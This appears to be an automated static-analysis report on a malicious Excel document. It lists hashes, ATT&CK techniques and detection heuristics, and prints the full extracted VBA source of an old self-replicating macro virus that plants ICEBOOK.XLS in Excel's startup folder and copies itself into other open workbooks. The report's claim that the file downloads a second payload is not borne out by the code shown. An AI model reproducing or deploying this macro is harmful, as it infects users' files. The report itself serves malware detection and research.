Xls.Dropper.Agent-1633146 — Office (OLE) malware analysis

Static analysis result for SHA-256 d567d6b6121065f2…

MALICIOUS

Office (OLE)

28.0 KB Created: 2014-04-29 05:09:33 Authoring application: Microsoft Excel First seen: 2015-02-17
MD5: c26e811b04f27f1e71719a365256cf59 SHA-1: 94822660570f5e27d92c81a6660b5bac4f52033e SHA-256: d567d6b6121065f2f4651f98e32dcd4228128c208cd66329b1906e0ae35b1c45
88 Risk Score

Malware Insights

Xls.Dropper.Agent-1633146 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This Excel document contains a VBA macro that is triggered by the 'auto_open' subroutine. The macro attempts to save a copy of itself as 'ICEBOOK.XLS' in the startup path, and then appears to prepare for further execution. The ClamAV detection name 'Xls.Dropper.Agent-1633146' strongly suggests this is a dropper malware designed to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Xls.Dropper.Agent-1633146 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-1633146
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1837 bytes
SHA-256: 816984d0f10020575f5559f5cdef52179027d4e8a6550d76bc0024307aa7f767
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Ice"

' Ice-LC's work! Do you like it?
' 25 Jan 1999. С днём студента!
' Bonne voyage!

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
  Application.OnWindow = "ice_action"
End Sub

Sub ice_action()
Attribute ice_action.VB_Description = "0"
Attribute ice_action.VB_ProcData.VB_Invoke_Func = " \n14"
  Dim c As String, ab As String, newname As String
  Dim ib As Integer, wb As Integer, i As Integer
  
  On Error Resume Next
    
  c$ = Application.StartupPath
  If Dir(c$ & "\" & "ICEBOOK.XLS") = "ICEBOOK.XLS" Then ib = 1 Else ib = 0
  wb = 0
  For i = ActiveWorkbook.Modules.Count To 1 Step -1
    If ActiveWorkbook.Modules(i).name = "Ice" Then
      wb = 2
      Exit For
    End If
  Next i
    
  ab$ = ActiveWorkbook.name
  Select Case ib + wb
    Case 1
      Application.ScreenUpdating = False
      Workbooks("ICEBOOK.XLS").Sheets("Ice").Copy before:= _
          Workbooks(ab$).Sheets(1)
      Workbooks(ab$).Sheets("Ice").Visible = False
      Application.ScreenUpdating = True
    Case 2
      Application.ScreenUpdating = False
      Sheets("Ice").Visible = True
      Sheets("Ice").Copy
      With ActiveWorkbook
        .title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
      End With
      newname$ = ActiveWorkbook.name
      ActiveWindow.Visible = False
      Err = 0
      Workbooks(newname$).SaveAs Filename:=c$ & "\" & _
          "ICEBOOK.XLS", FileFormat:=xlNormal, Password:="", _
          WriteResPassword:="", ReadOnlyRecommended:=False, _
          CreateBackup:=False
      If Err = 0 Then Application.OnWindow = "icebook.xls!ice_action"
      Sheets("Ice").Visible = False
      Application.ScreenUpdating = True
  End Select
End Sub